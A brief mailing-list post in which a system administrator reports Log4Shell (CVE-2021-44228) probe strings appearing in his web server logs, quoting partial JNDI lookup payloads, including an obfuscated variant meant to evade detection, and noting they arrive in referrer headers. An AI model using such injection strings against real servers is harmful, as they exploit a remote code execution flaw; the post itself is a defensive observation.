[Info-vax] Java, log4j, log4shell, and OpenVMS: CVE-2021-44228

[Steven Schweda]

   I see that my Web server log has started to collect a variety of
"${jndi:ldap:" stuff, some of which is encoded to avoid simple
recognition ("${${lower:j}${lower:n}${lower:d}i:").  Interesting that
because the vulnerability is in the logging, the payload can appear in
the referrer string, not necessarily in the request URL itself.  What a
world, what a world...